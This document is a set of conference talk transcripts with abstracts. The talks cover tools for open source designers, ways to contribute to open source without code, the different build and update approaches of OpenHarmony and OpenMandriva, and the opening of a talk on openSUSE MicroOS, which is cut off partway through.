So you don't need to take the conversation out of that thread, but if you do, you want to add some pointers to that conversation in the thread, because those threads are really useful for documenting progress and updates and decisions that were made on that issue. So issue threads are really a nice way to document progress on design issues. One thing I always encourage designers to do is to annotate their sketches, wireframes and user flows. So when you make those diagrams, you want to put some little notes that can help anyone understand what the process is, and that way anyone can make a contribution or can give you valuable feedback; they don't even have to be designers, because those notes pretty much explain things clearly, and those notes can actually help you document the effort you put into that work. You should also explore: there are a lot of free and open source tools and resources out there that you can use in your work. You can get free assets and all that, but as you search, you want to understand the different types of licenses for these assets. Are they permissive licenses or not? Do they require attribution or not? So you should understand the different types of Creative Commons licenses so that you can very carefully use these assets, because if you don't, you end up putting not just yourself but the entire project at risk. So you want to make sure that the assets you are using are well licensed and you are able to use those assets in your work or in the project. So I have included a link to a webpage that explains the different types of Creative Commons licenses that you should definitely look at. Grow. The great thing about open source design is it gives designers an opportunity to expand and to grow in their career, so you can take part in open source internships or programs like Google Summer of Code or Outreachy, which really give designers the opportunity to contribute to open source. And it's a great experience, because not only do you get to make meaningful contributions to actual open source projects, but you get to interact with the community and see what it is like. You get to present your work and receive feedback or criticism on your work, and you get used to the whole open source pace. So you should definitely look out for that. And because we know that open source design is just coming up, you can advocate and let more people know about it and how to contribute to open source as designers. We'd definitely love to see more designers get involved in open source and make open source software more usable. So all of this will help you expand your portfolio, not just as an open source designer but as a designer in general, and that is really great for your career. So here are some tools and reads that I have included for your reference. Pen and paper are some of my favorite tools in design, but you can also use something like draw.io for diagramming, like your user flows and site maps. Figma and Adobe XD are prototyping tools that you can use for open source projects, but it really depends on what tool has already been adopted for that project. So if a certain tool is already in use, you want to try as much as possible to stick to that, so that other team members can be on the same page with you. The choice of prototyping tool, like I mentioned, really does depend on what is already in use, but if you feel something else will be better, then you need to suggest it to the project maintainer. Penpot is a free and open source prototyping tool that I just discovered.
I think it's interesting and you can definitely check it out. Inkscape is a vector graphics editor, and it's also free and open source. Blender is a free and open source 3D graphics tool. GIMP is an image manipulation and editing software that is also open source and free. And Synfig is a 2D animation tool that's free and open source as well. These are just a few of the free and open source tools that are available for your use as an open source designer, so you don't have to use expensive software just to contribute to open source. These tools are readily available, and all the links you find here, when you get the slides, you can actually just click on them and they will take you to the web page for that tool or project. So these are some reads that I found pretty interesting. This paper on barriers faced by newcomers to open source projects will really help you understand some of the things you can expect as you start to get into the open source space and how you can overcome those challenges. The article on barriers for designers is also a very nice read for designers and also for open source project maintainers; it helps them see how they can encourage more designers to contribute to their open source projects. So here's the link to the 10 usability heuristics you can use when conducting heuristic evaluations of an open source project UI. Untools, that is, tools for better thinking, is really nice for developing your problem-solving and thinking capability as a designer, and you should definitely check that out. Checklist Design is a collection of checklists that help you make sure you're not forgetting any important elements when designing screens for your open source project. And Open Design Now is a book that talks about open design, which is a very similar concept to open source design; reading this book will help you understand the future of design and open design as it is. And here's the link to CC licenses that helps you understand the different types of Creative Commons licenses available and how you can take advantage of each one. So the great part is you can find more of these links on opensourcedesign.net/resources. I feel this is a gold mine for every open source designer and it's definitely something that you should check out. You'll find a lot of free tools and resources that you can use in your work. So thanks to these amazing people; all these beautiful images I have showcased in my presentation and the resources were obtained from opensourcedesign.net. So thank you to these amazing people and thank you for listening to me while I talked through the open source designer's toolbox. I hope that you will find some of these resources and tools beneficial and valuable in your work, and I hope they encourage you to continue in your open source design career. You can find me on Twitter at abigel underscore mark, or you can visit my website abigelmarkuru.com where you can find links to my other social media profiles. So thank you for listening, and I really do look forward to seeing more designers contribute to open source. Let's make open source more beautiful and usable. Thanks. Okay, the Q&A should be starting soon. I'm looking at the main room. Lots of claps. Okay, we are in the main room. We have, there is a first question. It is: what are some good resources to find background images for websites and also icons? Do you have any recommendations, Abby? Yes, I would recommend Unsplash and Pixabay, and there is also the Creative Commons gallery.
So I think there are links to those in my presentation slides as well. So there is a lot, actually, so please do check them out. So lots of praise coming in for your talk and the presentation, like the layout of the presentation. I have a question if nobody else has a question. What do you want to see more of from designers in open source, Abby? I'd love to see more programs encouraging designers to contribute. So we have GSoC and Outreachy, and as of the last time I checked, I noticed there were a lot of projects for developers but not as many for designers, and that wasn't very encouraging. So seeing more projects and programs like that. I'd also like to see more conversations between designers and contributors to a particular project, and I'd also love to see more designers work collaboratively with other designers on projects that are just open design. I'd definitely love to see more of that. For sure. Yeah, me too. I cannot agree more about that last point about more designers collaborating together. We might get cut off really soon. So we're going to have a little bit of a break.
|
As designers get introduced to FOSS, what should they know? What techniques and tools would they need, and why? This talk will explore a recommended guide to developing a productive open source design workflow.
|
10.5446/53617 (DOI)
|
Okay, yeah. Good day everyone. My name is Isaac. I'm a visual designer from Nigeria. I love skating, I love planting, and my hobbies include swimming. So let's jump into what we have today. I'm so excited to be speaking at FOSDEM 21; it's like a dream come true, like I've been anticipating this. And now, getting to share this on a bigger platform, I'm so glad. I'm happy and it's exciting for me because I've been in the open source space for like a year and a half, and it's like a dream come true because I wasn't expecting this. I was thinking that I would have to be like four to five years, or ten years, in open source for me to have this chance to speak and enlighten people. So, yeah, thanks to Piso, Jamie, thanks to Eryo Fox and Samson Godi for making me know about open source, because I never knew about open source until I met these amazing folks. Okay, let's dive into what we have today. I'll be sharing my thoughts about ways you can contribute to open source projects without writing lines of code. Okay, you should all know that there is this misconception that when you're contributing to open source, all you have to do is write code. And that has scared a lot of Nigerian designers, or let's say African designers, away from open source projects, because they feel that the only way to contribute is to push code: "I'm just a designer, those guys push code, I'm not a front-end web developer, I don't think they'll be needing me." I had this thought until I got to meet Eryo Fox and I attended the OSCAFest event. So right now I'm so happy to be sharing my thoughts about this. And I will tell you that there are amazing ways you can contribute to open source projects without writing lines of code; you won't even need to open your Visual Studio Code before you can contribute to open source. Okay, so let's get started. The first one is writing documentation. Documentation is very important when you're working on an open source project; it helps to keep track of the progress, and you have to make this information accessible for all users, for them to explore, and to guide them in the future. If you're working on an open source project, you won't be working on it forever, so you have to document the processes so that whenever some other person comes to contribute, they can understand where things are coming from. Okay, so the next one will be identifying bugs. Please, I'm really sorry if I'm kind of fast; I have to do this because I have only a little time for this. Okay, this one is identifying bugs. It is very important to fix bugs before you put the software live. So this is where you come in: you check if the app is going to misbehave when it's being launched or when it's on demo. So, as an open source contributor, you check for this to avoid stories that touch in the future. The next one is kind of similar to identifying bugs; it's called testing code. There is a process that involves executing the program with the intent of finding errors or other issues. So a good test is very important, and when you're testing code it's easier to see the errors and avoid mistakes when the software is released.
So if you are interested in testing code as an open source contributor, it's advisable that you do this early and make sure it's done well, to avoid problems when the software is being launched. The next one is answering queries from users. Okay, this is an interesting way of contributing to open source. You literally don't need to open your VS Code for this; you just have to serve as the bridge between the users and the developers of the open source product, and collect information on the pain points of the users. This is very good because you're taking this information and getting it back to the developers in order to make the software, or the app, or whatever is being worked on, better. This mechanism, where certain information is collected and passed back, is called answering the queries. It's a process where you just take issues, give them to the developer or to your project manager, and say: okay, these are the issues we need to work on, this is where the users are crying, and these we need to fix. Okay, so the next one is moderating and organizing events. Oh yeah, thanks to you folks, you guys made me love contributing to open source, and the moderating and organizing events part is my favorite part. I'm a designer, but I always love to volunteer and moderate events because it's a great platform where you get to meet amazing people, you get to share insights, you're given a platform to share your thoughts, and there is no discrimination. I am looking forward to moderating and organizing a number of events this year, and I can't wait to see that happen. Okay, so meetups are a great way for open source community members to learn from each other, collaborate, and talk about open source projects. So you can contribute to open source by moderating events, either by hosting them, or by taking questions from the folks in the comment section and giving them to the speaker, or you can be part of the promotion, the folks in charge of promotion and also the social media part. So you shouldn't think that because you're not on screen, you can't moderate an event; you can help organize an event by working on designs too. Okay. Yeah, so that's it. So, examples of open source events and conferences: I know there are a ton of them, quite many, but I know these and they are quite a few. The first one is PyCon, then FOSDEM, the Red Hat Summit, OSCAFest that happened last year in Nigeria, the Open Source Summit, the OpenUp Summit, Libre Graphics, All Things Open and OSCON. Okay, these are a few open source events and conferences I know; I know there are tons of them, like a lot of them. And the next one will be, yeah, you can also contribute to open source software with your visual design, or user interface, or user experience skills. You know, I have found out that most open source software is not flexible in terms of design; the experience is quite funny, if you can permit me saying this, like the experience is quite funny when I use them, and that's why, whenever I want to contribute to an open source software or open source project, I do it selflessly. I do it like I'm being paid for it, I do it like my life depends on it.
You know, so because I always want something great to come out of the open source space, I always want someone to use an open source software and be like, wow, this is awesome, who worked on this? Okay, so if you're a designer listening to this, please work on open source projects like your life depends on it. I'm not trying to exaggerate; I use this term because that's how I do it: make sure you give out your best. Because I found that most software, like I said, doesn't have this professional outlook, which is very, very bad. So this is where you come in, to change the narrative and fix those flaws. Okay. Yeah, the next one will be making monetary donations. Yeah, you can contribute to open source software even if you don't know how to design, you don't know how to code, or you don't want to moderate events and fix bugs and all that: you can help sustain the space by making some monetary donations. You can fund some open source projects and open source ideas, you can also fund some open source events, and that way you can also support open source. And there's a platform for this, which is where Open Collective comes in: it collects and disburses money transparently to sustain and grow open source projects. Yeah. The last one is advocacy. Yeah, advocate for open source. Okay. Yeah, I know someone, Ruth Ikegah; she always wears the open source hat. If you go to her timeline, you will see like two or three posts that are related to open source. You have to advocate for that space; advocacy is a very great way to contribute to open source technology, and you'll be doing so selflessly. You can do this by choosing software or apps that are open source and recommending them to people. For example, use VLC media player: you all know that it's open source software, and you recommend it to a friend of yours. Hey bro, can you use this software? It works very fine, it plays 4K videos, it plays 1080p videos and stuff like that. Yeah, this is a way you can contribute to open source; it's a great way you can sustain and advocate for the open source technology. I bet you, if you do this, there will be a lot more people in the open source space. So, I'm really glad that the ones I mentioned here are not related to anything that has to do with code. From fixing bugs, beta testing, UI design, moderating events and all, you see that these are things you can do from the comfort of your house; you just have to be selfless. So I'm here to encourage you to just contribute to open source; it shouldn't be limited, as if open source only has to do with code. Yeah, you can contribute to open source with code, you can push some code, you can help do some stuff, you can do some DevOps and all, but you can also contribute to open source without writing code. I'm so happy that I shared my thoughts today. If you enjoyed my talk today, just let me know. And if there are any questions, please just shoot them below; I will be able to answer them. Thank you very much.
|
A common misconception about contributing to open source is that you need to write code. In fact, it’s often the other parts of a project that are in urgent need of assistance. There are other ways of helping an open source project which include 1.Writing documentation, 2.Identifying bugs, 3.Testing code, 4.Answering queries from users, 5.Moderate/organize events, 6.User Interface & User Experience Design 7.Making a monetary donation, 8.Advocacy.
|
10.5446/53621 (DOI)
|
Hi, welcome to this FOSDEM session. I am Bill and today we are going to talk about two completely different approaches to building a Linux distribution, the ones taken by OpenHarmony and OpenMandriva. If you have attended any of my other talks, you know I don't usually do the "about me" thing; I am not important, my topics are. But this time I have decided to make a bit of an exception, because it does answer a few questions. Like, am I talking about one project I know well and another one I only understand basically? Or am I trying to promote one approach by bashing another? And why am I just picking two different projects that are not exactly household names yet, even though I of course hope both will be? So the answer to those is: I have been working with OpenMandriva since 2012, I am currently the president of the OpenMandriva Association, and I was a contributor to Mandrake back in its roots in 1998-1999. More recently, in November last year, I joined the Huawei Open Source Technology Center, which is building OpenHarmony, as a principal technologist. So I understand both projects, I am involved with decision making in both, and I think both approaches are perfectly valid. There might be reasons to go either way, so let's take a look at what those reasons might be. Since both projects are not exactly well known yet, first of all we are going to take a quick look at what they are, starting with OpenHarmony. Its idea is to be more than an operating system. It can use multiple different kernels, so it can run with Linux and with Zephyr, and in the future probably a few others; we are looking at FreeRTOS, we are looking at LiteOS, and there might be others in the future. The key goal is autonomous cooperative devices: multiple devices forming a distributed virtual bus that can share resources. Initial target devices are the Avenger96 board, which is a 32-bit ARMv7 with Cortex-A7 and M4 cores, and the Nitrogen96 board, which is Cortex-M4. OpenHarmony is built with OpenEmbedded and Yocto, so there is one command that builds the entire OS. It is a fully open project, developed as an open source project, not so much an in-house product, from the start. For more information there is a great talk by Stefan Schmidt, my co-worker, in the Embedded devroom at 5.30; you can look at what he is going to say or you can talk to us at the Huawei OSTC stand. Both of us should be there at some point. As for OpenMandriva, that is a more traditional Linux distribution, also completely controlled by the community, continuing where Mandriva left off after the company behind it went out of business in 2012. Its roots go back to the first Mandrake Linux release in 1998. It was originally targeting only x86 PCs; support for additional architectures, AArch64, ARMv7hnl, RISC-V, was added later. The repositories contain 17,618 packages, and each of those packages is built and updated individually, then assembled into an installable product with omdv-build-iso or OS image builder. For more information about this, you can go to the OpenMandriva website or visit the OpenMandriva stand at FOSDEM. So let's take a look at how OpenHarmony is built. You download the operating system source, go into the directory, use the repo command to download a couple of git repositories that will get you BitBake recipes, board description files, and configuration files describing how everything needs to be built, and everything will be built from sources.
Then you initialize the environment, setting a couple of environment variables and adding a couple of extra BitBake layers. That sets up the build system with everything that's needed. You set a couple more parameters and run BitBake, and that takes care of everything else for you. The source for the actual components is downloaded, unless it's already in the cache from a previous build, and it's built according to what's in the BitBake recipes and assembled into an image that works for the target machine you've specified. So you run this command and you get an image of the OS. OpenMandriva, in contrast, is built differently. Every upstream package, a library or an application, is packaged in a separate RPM file. The package is then sent to ABF, the Advanced Build Farm, which sends it to builders for all supported architectures. At this time, that's x86_64; znver1, which is a special case of x86_64 for current Ryzen processors; AArch64; ARMv7hnl; 64-bit RISC-V; i686; and we recently got access to a PowerPC64 machine that will probably be added in the future. All the builds are done as native builds on a machine matching the architecture, or at least coming close in the case of RISC-V, where we're currently using QEMU on faster machines. But that might change with the release of the new BeagleV and the SiFive boards. If the build succeeded on all the architectures, the package is added to the repositories, and if necessary, packages depending on it are rebuilt. When we want to build an operating system image, like the recent 4.2 release, there's a script that assembles the packages and builds them into an ISO image, or, with the advent of non-x86 support, into an image that works for a specific board in whatever format that target needs. None of the packages are rebuilt at that time. So why would people opt for those different possibilities? In OpenHarmony, we are building everything from source in one go. We need to cross-compile; cross-compiling is built into the OS builder by design. You certainly don't want to build an OS natively on a Cortex-M4 powered device; that would take forever. This approach makes it easier to build on top of different kernels, like Linux, Zephyr, and other options that will be added later, with completely different requirements. For example, not every RTOS supports shared libraries. If you don't have shared libraries, you have to build everything in a completely different way. A build script from a Linux system that relies on a lot of pre-installed shared libraries will not necessarily work in that context, and a build script made for Zephyr will not work nicely on a Linux system. This approach also makes it easier to work with boards that need custom kernels, custom bootloaders, everything. Those kernels will be put in at build time; there is no need to have pre-built packages for those kernels. There is no possibility of problems caused by ABI changes in a library, because everything is guaranteed to be built at the same time against the library version that is actually in use. Lastly, it also makes the use of license compliance tools like reuse easier, because all the source is in one place and the tool can check where license problems might be occurring, gather statistics on how many GPL files are there, and make sure that no GPL files are linked into projects using a different open source, but not GPL compatible, license, and things like that. Why did we decide to use binary packages in OpenMandriva? One thing is there are lots of packages: 17,618 packages.
Some of them are pretty big, like LibreOffice; they would take multiple days even on modern hardware. Given that OpenMandriva, or rather its predecessor Mandrake, started in 1998, try doing the same thing in 1998 and you will know why binary packages were really the only option. Another thing is that, for a larger system where not everyone is expected to update at the same time, updating individual packages is often preferable over an OTA approach. On a larger system, not every user has the same packages installed. Only few people need, for example, KDE Plasma and GNOME at the same time; people generally pick one. That is obviously easier if they are separate packages. This approach also supports packages that cannot be cross-compiled, which sadly still exist. Another big difference is how they are updated. OpenHarmony is updated generally as an OTA image; the entire OS is updated in one go. Updates will be some variant of a file system image, or a delta to a previous file system image, assuming that we already know what is there before. Updates are sent to users when a new version has been completed and tested. There are only updates that update the entire system, not just an individual part. Some details of this are still being worked out because the first official OpenHarmony release hasn't happened yet, so some things may change slightly, but in general this is how things will go. In contrast, OpenMandriva is updated by updating individual packages. On Cooker, the development tree, and on the rolling release tree, people usually receive updated packages every day, many times several times a day. Users of Rock, which is the stable tree, get only tested packages, and only once in a while. Machines are updated between releases: Rock is always a symlink to the current release. If you installed 4.1 and told it to follow Rock, you should have received an update to 4.2 a while ago. Users of the release tree stay on their release forever, even after its end of life. If you installed 4.1 and you opted to stay on the release tree instead of going to Rock, rolling or Cooker, you will stay on 4.1 forever and you won't get 4.2. So, why would people prefer OTA updates, OpenHarmony style? They provide a guaranteed consistent system. People will always get a build that has been tested in its entirety. There's no possibility of a user getting an updated library without the corresponding application being rebuilt against that library, so no problem of an application crashing because a library has been updated and the application hasn't been rebuilt. There's no need for a lot of temporary storage for updated packages being downloaded on the running system; on systems that are extremely short on storage, like a Nitrogen96 board that has 512K of storage, that is potentially a problem, and the Nitrogen96 board is not necessarily the smallest target OpenHarmony will ever have. Of course, lastly, OTA updates are what people have come to expect in the consumer device space. There's nothing the user can do wrong; people expect to get updates without really noticing that their system has been updated. Why did we opt to do package updates on OpenMandriva? One important point is dealing with the fact that not every system has the same packages installed. There's no point in sending a GTK update to a pure Qt user or vice versa, no point in sending updated server packages to a desktop user, or a LibreOffice update to a server user, or stuff like this.
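To make the OTA model a bit more concrete before returning to the per-package side, here is a rough, generic sketch of the A/B slot pattern with automatic rollback that image-updated systems commonly rely on. It is a toy in-memory model, not OpenHarmony's actual updater; the class, its method names and its behaviour are assumptions made purely for illustration.

```python
# A toy, in-memory sketch of the A/B ("dual slot") OTA pattern with automatic
# rollback. This is NOT OpenHarmony's actual updater; everything here is an
# assumption made purely for illustration.

import hashlib

class ABUpdater:
    def __init__(self) -> None:
        self.slots = {"A": "os-v1", "B": None}  # image installed in each slot
        self.active = "A"                        # slot the device boots from
        self.trial = None                        # slot currently on a trial boot

    def apply_update(self, image: str, checksum: str) -> None:
        target = "B" if self.active == "A" else "A"
        # 1. Write the new image to the *inactive* slot: the running system is
        #    never touched, so a failed or interrupted write cannot brick it.
        self.slots[target] = image
        # 2. Verify the image before ever booting it.
        if hashlib.sha256(image.encode()).hexdigest() != checksum:
            self.slots[target] = None
            raise RuntimeError(f"verification failed, staying on slot {self.active}")
        # 3. Boot the new slot once, marked as a trial.
        self.trial = target
        self.active = target

    def first_boot(self, healthy: bool) -> str:
        # 4. A healthy first boot commits the update; an unhealthy one falls
        #    back to the previous slot, which still holds the old image.
        if not healthy:
            self.active = "B" if self.active == "A" else "A"
        self.trial = None
        return self.active

updater = ABUpdater()
new_image = "os-v2"
updater.apply_update(new_image, hashlib.sha256(new_image.encode()).hexdigest())
print(updater.first_boot(healthy=False))  # prints "A": rolled back to the old image
```

The key property is that the running slot is never modified, so a bad or interrupted update can always fall back to the previous image.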
The per-package approach, on the other hand, gives users more control over what exactly they are updating; it allows users to blacklist individual updates they don't want while still getting all the other features of a new release. And of course, it's also what people have come to expect on the Linux desktop and server. I think most people wouldn't take an OTA-style update too kindly on a traditional Linux distribution. We've seen a couple of small problems with either system, even though both have very good ideas and both work. When we started targeting non-x86 devices in OpenMandriva, we ran into two problems. One is that there's no defined standard format in which we can distribute images for non-PC devices. On a PC, we distribute an ISO file and that works for every PC, but that's not the case for other architectures. With most of the AArch64 servers these days, we can do pretty much the same, they support UEFI and ISO files, but there's a lot of interesting devices, from the Raspberry Pi to the Rock Pi to the Pinebook Pro to the PinePhone to the SiFive Unleashed, that simply don't. We still need some way to target those devices, which is easy in OpenHarmony. The other is that many SoCs require a custom kernel with many patches that aren't in the upstream kernel tree yet; they touch files all over the kernel and conflict with patches that are needed for other SoCs. It's quite a challenge to build a binary package containing a kernel that can support all the needed features for, for example, the current Qualcomm, MediaTek and Allwinner SoCs all at the same time. Again, for OpenHarmony that's not a problem at all, because the kernel is just put in at build time; we can simply specify different sources for a different board. Many other traditional Linux distributions have decided to solve this problem by not supporting any devices that don't support UEFI. So, on some of the more server-centric Linux distributions, you will only find an AArch64 ISO that can be installed on modern AArch64 servers, but it won't work on a Pinebook Pro or on a Raspberry Pi, which is why you often see custom spins of those distributions for those boards. But in OpenMandriva, we care about those boards and we care about Linux on the desktop; the Pinebook Pro is a great way to get there. That's, by the way, the device I'm using to record this video. And we also care a lot about phones that are not under the control of either Google or Apple, so we want to get OpenMandriva onto the PinePhone and other devices like that. So, limiting ourselves to UEFI is not the way to go. So, what could we do? Should we learn from OpenHarmony and rebuild the distribution the same way? The answer is: partially. For the reasons mentioned before, we can't switch to a fully-build-the-distribution-from-source-every-time mode; it would take weeks to get an ISO done for testing, then we fix one bug and build it again, and the update system would clash with that. But the new OS image builder that is being used for current releases takes some ideas from OpenHarmony and its OpenEmbedded base. So, just like OpenHarmony, we have a per-device config file that indicates which extra packages should be included for this device, and it can also specify a custom kernel repository, custom kernel config, device tree filename, custom U-Boot repository and things like that. For example, this is what the device config file for the Pinebook Pro looks like. It sets the architecture, so all the binary packages will be taken from the AArch64 repositories. It pulls in the kernel firmware extra packages for the Wi-Fi hardware.
If a GUI is being installed, it pulls in the Panfrost graphics driver. The kernel comes from a custom repository; the URL there is appended with "#branch" in order to make it possible to also pick a specific branch. Then we set the kernel config, a couple of extra kernel config options, the device tree filename, the U-Boot location and the U-Boot configuration, and that's it. OS image builder also allows replacing parts of the build script, so any odd requirements, like copying U-Boot to one particular sector on the SD card, or creating a FAT16 formatted partition, or creating a raw partition number four containing a kernel, or other odd requirements that some boards have, can be accommodated by that. But unlike the OpenHarmony process, the OpenMandriva OS image builder only builds the kernel and U-Boot, plus other components related to that board, at build time, and then pulls in the binary package repositories like other OpenMandriva builds. The script then outputs the install image for the right target device in the expected format, much like BitBake in OpenHarmony would have done in the first place. So, looking at it from the other side, will OpenHarmony run into any limits with its approach? Yes. As soon as we add a bigger target device (the Avenger96 and Nitrogen96 are rather small devices that are not really expected to offer a lot of package choice), we will need some way to deal with packages in OpenHarmony as well. That could be something similar to DNF or apt, possibly opkg, which is already there in the Yocto base, or maybe something closer to the AppGallery that exists on the de-Googlified Huawei phones, assuming that its license can be adjusted to be fully open, or maybe even something entirely new that's even better that we haven't thought of yet. We'll deal with the problem when we get there. Another takeaway is that there is clearly not one right way to build a distribution, and which approach works better often depends on the target devices. Projects targeting a wide range of devices will likely end up using a mixed form, like OpenMandriva's approach of having a more OpenHarmony-like script that builds different kernels, different bootloaders and different installation images, but then pulls in the binary packages from the repository, or OpenHarmony at some point adopting a more OpenMandriva-like way to package applications for bigger devices. That's the basic idea. As you can see, both approaches are perfectly valid, both have advantages, both have disadvantages. Both projects can learn from each other, and both projects can also use an extra hand, so we would like to see you there. You can visit our GitLab repository at the location listed. Our website should be up soon, and I hope to see you there soon. If you have any questions, please feel free to ask them, either now or using the contact information that was provided in the beginning, or just find us at either the OpenHarmony stand or the OpenMandriva stand. Thanks for your attention.
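Purely as an illustration of the kind of information such a per-device config carries, here is a rough Python representation. This is not the actual OS image builder syntax; the package names, URLs, branches and config values below are placeholders rather than OpenMandriva's real ones.

```python
# Purely illustrative: roughly the kind of information the per-device config
# described above carries, written as a Python dictionary. This is NOT the
# actual OS image builder syntax; package names, URLs, branches and file
# names below are placeholders, not OpenMandriva's real values.

pinebook_pro_like_config = {
    "arch": "aarch64",                            # which binary package repos to pull from
    "extra_packages": ["kernel-firmware-extra"],  # firmware for the board's hardware
    "gui_extra_packages": ["mesa-panfrost"],      # only added when a GUI is installed
    # Custom kernel source: repository URL with "#branch" to pick a branch.
    "kernel_repo": "https://example.org/vendor-kernel.git#board-branch",
    "kernel_config": "config-board.aarch64",
    "kernel_extra_config": ["CONFIG_EXAMPLE_OPTION=y"],
    "device_tree": "rockchip/rk3399-pinebook-pro.dtb",
    # Custom U-Boot source and configuration.
    "uboot_repo": "https://example.org/u-boot.git#board-branch",
    "uboot_config": "pinebook-pro-rk3399_defconfig",
}

# A build script driven by this data would compile only the kernel and U-Boot
# from source, then pull everything else as prebuilt packages for "arch".
print(pinebook_pro_like_config["arch"])
```

The point of the design is that only the board-specific pieces (kernel, bootloader) are built at image time, while everything else comes from the regular binary repositories.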
|
There are many Linux distributions out there - and almost as many different approaches to how they're built. Two distributions on nearly opposite ends of the spectrum include OpenMandriva (which uses binary packages, builds and updates each package individually, applications are part of the OS, ...) and OpenHarmony (which builds the OS from source in one go, is updated through OTA images, and treats applications as something separate, ...) A developer involved in both projects explains how the 2 projects go about building their respective OSes, why both projects made the choices they made, how the approaches differ from a developer and user perspective, and what approach works better for what particular use case.
|
10.5446/53622 (DOI)
|
Hello everybody at FOSDEM. My name is Richard Brown. I'm here from the openSUSE project to talk to you about openSUSE MicroOS. First, a little bit about myself. I've been an openSUSE contributor since the project began, and I've been working at SUSE now since 2013. I'm a really passionate advocate of rolling releases. In the past, I used to be a QA engineer; these days, I'm a Linux distribution engineer in SUSE's future technology team, working mostly on two different rolling distributions, MicroOS and Kubic, which is what I'm here to talk to you about today. In my spare time, I'm a rather avid photographer. When it comes to talking about what MicroOS is, I actually find it easier to ask the question: why is MicroOS? As a team, we've been looking at the way the world works these days. Even though Linux distributions are typically doing the same thing they have been doing for the last 20, 30 years, computers aren't the same as they have been for the last 20, 30 years. They're not just laptops, desktops and servers anymore, and even when they are your traditional laptops, desktops or servers, people aren't using them the same way they used to. Starting with an example of what isn't a traditional device: think of these IP webcams. These are small, let's say IoT, devices, but in practice each one is a small micro-computer. And this computer has firmware and an operating system, and then people realise they've never actually updated it. There are millions of these devices out there, and they've quite often got malware or are susceptible to contributing to things like botnets. But quite often manufacturers are very, very nervous about updating them, because a failed update is going to cause many, many unhappy customers. This isn't just a problem in the tiny IoT devices space; in the bigger, more widespread, embedded world, you have examples like this with O2 in the UK, where they have their entire network of devices across the entire country, all running their cell phone towers, where your phone connects to get its network access. And in 2019, they rolled out an update to all of these devices, and that update effectively bricked every single one of their cell phone towers and also broke the recovery mechanism for a failed firmware update. So the only way of fixing the issue was literally sending engineers out to every single cell phone tower in the country. Meanwhile, no one can get any cell phone access, no data, no 4G. The repair took a really, really long time, and it really stressed the need for update mechanisms where rollback and easy recovery are an absolutely key part. Another, more esoteric example of what you could call IoT or edge is something like this Siemens Vectron train, which in reality is a kind of 300-device rolling data center. You're talking about a train that has 300 different sensors, all needing to be available pretty much all of the time. You've got hundreds of these cars out there, billions of bits of data, literally terabytes of data, all needing to be processed. And no cellular uplink is going to be a sensible way of uploading this data all of the time. So quite often this data has to be locally analyzed, locally processed, so you effectively have a full blown data center moving around the country on a train the whole time.
And then they need to be able to be updated via these slow remotes links and then be able to, when they're back in the depot, when they're able to have a decent internet connection, then send the pre-processed data up to some big data cloud for actual proper deeper analysis. And of course, another example is sort of this sort of really big cluster example of, you know, not just a few machines where you can quite easily micromanage them sort of the very, with sort of the traditional sort of pet cattle analogy, you know, these aren't machines which are going to be cared for micromanaged or micromanageable. You're talking about hundreds of machines, far too many for any one person or even a team to easily look after. They all need to be the same operating system version. We'll be talking about some kind of workload orchestration on these clusters such as Kubernetes. And the need really strikes home with that when you've got these hundreds or thousands of machines to have automatic update, automatic rollback. And if there is any kind of machine, problem machine, it's far more likely that that machine is going to be killed and then replaced rather than, you know, carefully lovingly bought back to attention and brought back to regular working behavior. So, you know, the teams, my team's been kind of looking at this and realizing that, you know, in many respects, we're living in a new world where the cloud is ambiguous. Everybody has cloud options now they might not all be using it. But if you need more hardware on the cloud, you know, a few more machines is just a credit guard away. You've got all of these IoT devices out there, always single purpose, all needing to have some way of being updated. Even in sort of the traditional data center, you know, virtualization is endemic, you know, there's more services running in more VMs not and when customers or users need to add more services, you don't necessarily just add more machines to their networks, they can add more VMs to their existing infrastructure that they have. And you have of course containers which helps this sort of grease the wheels of this new world where you've got the sandboxing limiting incompatibilities and isolating service problems. So if something does go wrong, it doesn't necessarily impact the entire system or bring down other services that are unrelated to the container or containers that are misbehaving. Outside of the data center and server worlds, you know, I've also been looking at this from sort of the desktop side. And if you look at the education industry, which I used to work in before I got into all this IT stuff, then you'll see that, you know, in the US at least, you know, the standard desktop is more and more disappearing, or many of us gone, and the kind of main teaching aid in these Chrome OS networks, you know, basically desktop appliances, all the applications being nice, simple lightweight apps, they're easier to manage. They're easier for less and less. That's IT literate staff to help manage for you. So you don't need to have a complicated IT department looking after it. And okay, that's in the US, which might not necessarily be a perfect example of the entire world. But if you look at the rest of the world outside the US, you'll see over the last years, this trend is starting to grow there as well, where even Windows and Mac, and even Linux are getting sort of pushed out of the education industry, and Chrome OS is typically becoming more becoming the first experience that students have in the classroom. 
And so when you're thinking about, you know, what should be the first, or what should be the root for desktop Linux, makes me start wondering, you know, maybe the root needs to be more aligned with what Chrome and Chrome OS are doing in the same way that we used to align desktop Linux to kind of poach Windows users. Maybe we need to start thinking about, you know, Chrome OS to be a sort of easy on ramp for people who basically learned Chrome OS in the school as they've been growing up. Regardless, if these machines are end user devices or running a data center, there are some pretty common requirements that run through despite these very different use cases. These operating systems need to be very small. The users don't want to necessarily micro manage these machines in the same way they've been traditionally doing so. The smaller the machine, the less there is to change, the less there is to manage, the less updates. They also is a very common need for a very predictable operating system. You know, it needs to work in exactly the way it's expected to. Once it's working in that way, it needs to stay that way and not change its behavior unexpectedly. It needs to obviously be reliable and work. In order to these requirements, you're talking very much of appliances or single purpose machines. So not everybody is going to have the same requirements, exactly the same set of examples. So having automatic personalization, so it's very easy for a different school or different company or different manufacturer embedding this into their devices. We have to personalize it specifically for the use case. Like discussed with the O2 examples and the IoT examples, any kind of failure of updating needs to be able to automatically roll back. There's lots of places, especially in the IoT world, where real time is a hard requirement. And in almost all these cases, we're talking about having containers or some kind of containerized framework being sort of the first class workload, if not the sole workload running on top of this operating system. And with these requirements, with these examples, with these use cases, regular Linux just isn't good enough anymore. It breaks my heart to say that as a long term open SUSE user, but regular distributions are like Swiss Army knives. There's a ton of services, a ton of features, but those tons of services and features end up being the biggest problem. There's always an increased chance that they're going to be incompatible or adding some new service, break some other service. And I've had plenty of cases where even really well managed machines have an issue on service A, which then kind of cause a cascading failure with different services, BCD, et cetera. And it can be a real nightmare digging down, figuring out the root cause, analyzing that and then bringing the system back up and running. And these are all kind of ways of living that just don't really fit with this sort of new world order of embedded devices, single purpose devices and appliance desktops. You see this today in the data center with VMs. You don't have a situation where you, like you were traditionally where you install a server and then you put on your mail server, your DNS server and some identity system all on the same machine. Typically, even in the most basic server environment, you're dealing in VMs where you'd have a single VM for your DNS, a single VM for your mail, a single VM for your identity management. 
